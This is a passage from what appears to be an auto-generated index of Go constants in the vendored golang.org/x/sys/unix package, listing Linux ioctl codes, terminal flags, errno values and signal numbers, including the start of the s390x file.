TIOCCBRK = 0x5428 constant TIOCCONS (line 392) | TIOCCONS = 0x541d constant TIOCEXCL (line 393) | TIOCEXCL = 0x540c constant TIOCGDEV (line 394) | TIOCGDEV = 0x80045432 constant TIOCGETD (line 395) | TIOCGETD = 0x5424 constant TIOCGEXCL (line 396) | TIOCGEXCL = 0x80045440 constant TIOCGICOUNT (line 397) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 398) | TIOCGISO7816 = 0x80285442 constant TIOCGLCKTRMIOS (line 399) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 400) | TIOCGPGRP = 0x540f constant TIOCGPKT (line 401) | TIOCGPKT = 0x80045438 constant TIOCGPTLCK (line 402) | TIOCGPTLCK = 0x80045439 constant TIOCGPTN (line 403) | TIOCGPTN = 0x80045430 constant TIOCGPTPEER (line 404) | TIOCGPTPEER = 0x5441 constant TIOCGRS485 (line 405) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 406) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 407) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 408) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 409) | TIOCGWINSZ = 0x5413 constant TIOCINQ (line 410) | TIOCINQ = 0x541b constant TIOCLINUX (line 411) | TIOCLINUX = 0x541c constant TIOCMBIC (line 412) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 413) | TIOCMBIS = 0x5416 constant TIOCMGET (line 414) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 415) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 416) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 417) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 418) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 419) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 420) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 421) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 422) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 423) | TIOCM_SR = 0x10 constant TIOCM_ST (line 424) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 425) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 426) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 427) | TIOCOUTQ = 0x5411 constant TIOCPKT (line 428) | TIOCPKT = 0x5420 constant TIOCSBRK (line 429) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 430) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 431) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 432) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 433) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 434) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 435) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 436) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 437) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 438) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 439) | TIOCSETD = 0x5423 constant TIOCSIG (line 440) | TIOCSIG = 0x40045436 constant TIOCSISO7816 (line 441) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 442) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 443) | TIOCSPGRP = 0x5410 constant TIOCSPTLCK (line 444) | TIOCSPTLCK = 0x40045431 constant TIOCSRS485 (line 445) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 446) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 447) | TIOCSSOFTCAR = 0x541a constant TIOCSTI (line 448) | TIOCSTI = 0x5412 constant TIOCSWINSZ (line 449) | TIOCSWINSZ = 0x5414 constant TIOCVHANGUP (line 450) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 451) | TOSTOP = 0x100 constant TUNATTACHFILTER (line 452) | TUNATTACHFILTER = 0x401054d5 constant TUNDETACHFILTER (line 453) | TUNDETACHFILTER = 0x401054d6 constant TUNGETDEVNETNS (line 454) | TUNGETDEVNETNS = 0x54e3 constant TUNGETFEATURES (line 455) | TUNGETFEATURES = 0x800454cf constant TUNGETFILTER (line 456) | TUNGETFILTER = 0x801054db constant TUNGETIFF (line 457) | TUNGETIFF = 0x800454d2 constant TUNGETSNDBUF (line 458) | TUNGETSNDBUF = 0x800454d3 constant TUNGETVNETBE (line 459) | TUNGETVNETBE = 0x800454df constant TUNGETVNETHDRSZ (line 460) | TUNGETVNETHDRSZ = 0x800454d7 constant TUNGETVNETLE (line 461) | TUNGETVNETLE = 0x800454dd constant TUNSETCARRIER (line 462) | TUNSETCARRIER = 0x400454e2 constant TUNSETDEBUG (line 463) | TUNSETDEBUG = 0x400454c9 constant TUNSETFILTEREBPF (line 464) | TUNSETFILTEREBPF = 0x800454e1 constant TUNSETGROUP (line 465) | TUNSETGROUP = 0x400454ce constant TUNSETIFF (line 466) | TUNSETIFF = 0x400454ca constant TUNSETIFINDEX (line 467) | TUNSETIFINDEX = 0x400454da constant TUNSETLINK (line 468) | TUNSETLINK = 0x400454cd constant TUNSETNOCSUM (line 469) | TUNSETNOCSUM = 0x400454c8 constant TUNSETOFFLOAD (line 470) | TUNSETOFFLOAD = 0x400454d0 constant TUNSETOWNER (line 471) | TUNSETOWNER = 0x400454cc constant TUNSETPERSIST (line 472) | TUNSETPERSIST = 0x400454cb constant TUNSETQUEUE (line 473) | TUNSETQUEUE = 0x400454d9 constant TUNSETSNDBUF (line 474) | TUNSETSNDBUF = 0x400454d4 constant TUNSETSTEERINGEBPF (line 475) | TUNSETSTEERINGEBPF = 0x800454e0 constant TUNSETTXFILTER (line 476) | TUNSETTXFILTER = 0x400454d1 constant TUNSETVNETBE (line 477) | TUNSETVNETBE = 0x400454de constant TUNSETVNETHDRSZ (line 478) | TUNSETVNETHDRSZ = 0x400454d8 constant TUNSETVNETLE (line 479) | TUNSETVNETLE = 0x400454dc constant UBI_IOCATT (line 480) | UBI_IOCATT = 0x40186f40 constant UBI_IOCDET (line 481) | UBI_IOCDET = 0x40046f41 constant UBI_IOCEBCH (line 482) | UBI_IOCEBCH = 0x40044f02 constant UBI_IOCEBER (line 483) | UBI_IOCEBER = 0x40044f01 constant UBI_IOCEBISMAP (line 484) | UBI_IOCEBISMAP = 0x80044f05 constant UBI_IOCEBMAP (line 485) | UBI_IOCEBMAP = 0x40084f03 constant UBI_IOCEBUNMAP (line 486) | UBI_IOCEBUNMAP = 0x40044f04 constant UBI_IOCMKVOL (line 487) | UBI_IOCMKVOL = 0x40986f00 constant UBI_IOCRMVOL (line 488) | UBI_IOCRMVOL = 0x40046f01 constant UBI_IOCRNVOL (line 489) | UBI_IOCRNVOL = 0x51106f03 constant UBI_IOCRPEB (line 490) | UBI_IOCRPEB = 0x40046f04 constant UBI_IOCRSVOL (line 491) | UBI_IOCRSVOL = 0x400c6f02 constant UBI_IOCSETVOLPROP (line 492) | UBI_IOCSETVOLPROP = 0x40104f06 constant UBI_IOCSPEB (line 493) | UBI_IOCSPEB = 0x40046f05 constant UBI_IOCVOLCRBLK (line 494) | UBI_IOCVOLCRBLK = 0x40804f07 constant UBI_IOCVOLRMBLK (line 495) | UBI_IOCVOLRMBLK = 0x4f08 constant UBI_IOCVOLUP (line 496) | UBI_IOCVOLUP = 0x40084f00 constant VDISCARD (line 497) | VDISCARD = 0xd constant VEOF (line 498) | VEOF = 0x4 constant VEOL (line 499) | VEOL = 0xb constant VEOL2 (line 500) | VEOL2 = 0x10 constant VMIN (line 501) | VMIN = 0x6 constant VREPRINT (line 502) | VREPRINT = 0xc constant VSTART (line 503) | VSTART = 0x8 constant VSTOP (line 504) | VSTOP = 0x9 constant VSUSP (line 505) | VSUSP = 0xa constant VSWTC (line 506) | VSWTC = 0x7 constant VT1 (line 507) | VT1 = 0x4000 constant VTDLY (line 508) | VTDLY = 0x4000 constant VTIME (line 509) | VTIME = 0x5 constant VWERASE (line 510) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 511) | WDIOC_GETBOOTSTATUS = 0x80045702 constant WDIOC_GETPRETIMEOUT (line 512) | WDIOC_GETPRETIMEOUT = 0x80045709 constant WDIOC_GETSTATUS (line 513) | WDIOC_GETSTATUS = 0x80045701 constant WDIOC_GETSUPPORT (line 514) | WDIOC_GETSUPPORT = 0x80285700 constant WDIOC_GETTEMP (line 515) | WDIOC_GETTEMP = 0x80045703 constant WDIOC_GETTIMELEFT (line 516) | WDIOC_GETTIMELEFT = 0x8004570a constant WDIOC_GETTIMEOUT (line 517) | WDIOC_GETTIMEOUT = 0x80045707 constant WDIOC_KEEPALIVE (line 518) | WDIOC_KEEPALIVE = 0x80045705 constant WDIOC_SETOPTIONS (line 519) | WDIOC_SETOPTIONS = 0x80045704 constant WORDSIZE (line 520) | WORDSIZE = 0x40 constant XCASE (line 521) | XCASE = 0x4 constant XTABS (line 522) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 523) | _HIDIOCGRAWNAME = 0x80804804 constant _HIDIOCGRAWPHYS (line 524) | _HIDIOCGRAWPHYS = 0x80404805 constant _HIDIOCGRAWUNIQ (line 525) | _HIDIOCGRAWUNIQ = 0x80404808 constant EADDRINUSE (line 530) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 531) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 532) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 533) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 534) | EALREADY = syscall.Errno(0x72) constant EBADE (line 535) | EBADE = syscall.Errno(0x34) constant EBADFD (line 536) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 537) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 538) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 539) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 540) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 541) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 542) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 543) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 544) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 545) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 546) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 547) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 548) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 549) | EDEADLOCK = syscall.Errno(0x23) constant EDESTADDRREQ (line 550) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 551) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 552) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 553) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 554) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 555) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 556) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 557) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 558) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 559) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 560) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 561) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 562) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 563) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 564) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 565) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 566) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 567) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 568) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 569) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 570) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 571) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 572) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 573) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 574) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 575) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 576) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 577) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 578) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 579) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 580) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 581) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 582) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 583) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 584) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 585) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 586) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 587) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 588) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 589) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 590) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 591) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 592) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 593) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 594) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 595) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 596) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 597) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 598) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 599) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 600) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 601) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 602) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 603) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 604) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 605) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 606) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 607) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 608) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 609) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 610) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 611) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 612) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 613) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 614) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 615) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 616) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 617) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 618) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 619) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 620) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 621) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 622) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 623) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 624) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 625) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 626) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 627) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 628) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 633) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 634) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 635) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 636) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 637) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 638) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 639) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 640) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 641) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 642) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 643) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 644) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 645) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 646) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 647) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 648) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 649) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 650) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 651) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 652) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 653) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_s390x.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x80081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x40081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x1277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x1261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x1265 constant BLKFRASET (line 36) | BLKFRASET = 0x1264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x80081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x1260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x80081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x1278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x1279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x127b constant BLKRAGET (line 43) | BLKRAGET = 0x1263 constant BLKRASET (line 44) | BLKRASET = 0x1262 constant BLKROGET (line 45) | BLKROGET = 0x125e constant BLKROSET (line 46) | BLKROSET = 0x125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x127e constant BLKRRPART (line 48) | BLKRRPART = 0x125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x1267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x1266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x1268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x81484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x80104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x40049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x4020940d constant FLUSHO (line 87) | FLUSHO = 0x1000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x40806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x80086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x8010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x40086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613 constant F_GETLK (line 95) | F_GETLK = 0x5 constant F_GETLK64 (line 96) | F_GETLK64 = 0x5 constant F_GETOWN (line 97) | F_GETOWN = 0x9 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x6 constant F_SETLK64 (line 100) | F_SETLK64 = 0x6 constant F_SETLKW (line 101) | F_SETLKW = 0x7 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0x7 constant F_SETOWN (line 103) | F_SETOWN = 0x8 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x80084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x90044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x80044801 constant HUPCL (line 109) | HUPCL = 0x400 constant ICANON (line 110) | ICANON = 0x2 constant IEXTEN (line 111) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9 constant ISIG (line 115) | ISIG = 0x1 constant IUCLC (line 116) | IUCLC = 0x200 constant IXOFF (line 117) | IXOFF = 0x1000 constant IXON (line 118) | IXON = 0x400 constant MAP_ANON (line 119) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x2000 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x4000 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 129) | MAP_STACK = 0x20000 constant MAP_SYNC (line 130) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x4 constant MEMERASE (line 134) | MEMERASE = 0x40084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x40104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x40084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x80204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x80c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x80044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x80084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x40084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x40084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x40084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x4d13 constant NFDBITS (line 148) | NFDBITS = 0x40 constant NLDLY (line 149) | NLDLY = 0x100 constant NOFLSH (line 150) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 151) | NS_GET_NSTYPE = 0xb703 constant NS_GET_OWNER_UID (line 152) | NS_GET_OWNER_UID = 0xb704 constant NS_GET_PARENT (line 153) | NS_GET_PARENT = 0xb702 constant NS_GET_USERNS (line 154) | NS_GET_USERNS = 0xb701 constant OLCUC (line 155) | OLCUC = 0x2 constant ONLCR (line 156) | ONLCR = 0x4 constant OTPERASE (line 157) | OTPERASE = 0x400c4d19 constant OTPGETREGIONCOUNT (line 158) | OTPGETREGIONCOUNT = 0x40044d0e constant OTPGETREGIONINFO (line 159) | OTPGETREGIONINFO = 0x400c4d0f constant OTPLOCK (line 160) | OTPLOCK = 0x800c4d10 constant OTPSELECT (line 161) | OTPSELECT = 0x80044d0d constant O_APPEND (line 162) | O_APPEND = 0x400 constant O_ASYNC (line 163) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 164) | O_CLOEXEC = 0x80000 constant O_CREAT (line 165) | O_CREAT = 0x40 constant O_DIRECT (line 166) | O_DIRECT = 0x4000 constant O_DIRECTORY (line 167) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 168) | O_DSYNC = 0x1000 constant O_EXCL (line 169) | O_EXCL = 0x80 constant O_FSYNC (line 170) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 171) | O_LARGEFILE = 0x0 constant O_NDELAY (line 172) | O_NDELAY = 0x800 constant O_NOATIME (line 173) | O_NOATIME = 0x40000 constant O_NOCTTY (line 174) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 175) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 176) | O_NONBLOCK = 0x800 constant O_PATH (line 177) | O_PATH = 0x200000 constant O_RSYNC (line 178) | O_RSYNC = 0x101000 constant O_SYNC (line 179) | O_SYNC = 0x101000 constant O_TMPFILE (line 180) | O_TMPFILE = 0x410000 constant O_TRUNC (line 181) | O_TRUNC = 0x200 constant PARENB (line 182) | PARENB = 0x100 constant PARODD (line 183) | PARODD = 0x200 constant PENDIN (line 184) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 185) | PERF_EVENT_IOC_DISABLE = 0x2401 constant PERF_EVENT_IOC_ENABLE (line 186) | PERF_EVENT_IOC_ENABLE = 0x2400 constant PERF_EVENT_IOC_ID (line 187) | PERF_EVENT_IOC_ID = 0x80082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 188) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x4008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 189) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409 constant PERF_EVENT_IOC_PERIOD (line 190) | PERF_EVENT_IOC_PERIOD = 0x40082404 constant PERF_EVENT_IOC_QUERY_BPF (line 191) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 192) | PERF_EVENT_IOC_REFRESH = 0x2402 constant PERF_EVENT_IOC_RESET (line 193) | PERF_EVENT_IOC_RESET = 0x2403 constant PERF_EVENT_IOC_SET_BPF (line 194) | PERF_EVENT_IOC_SET_BPF = 0x40042408 constant PERF_EVENT_IOC_SET_FILTER (line 195) | PERF_EVENT_IOC_SET_FILTER = 0x40082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 196) | PERF_EVENT_IOC_SET_OUTPUT = 0x2405 constant PPPIOCATTACH (line 197) | PPPIOCATTACH = 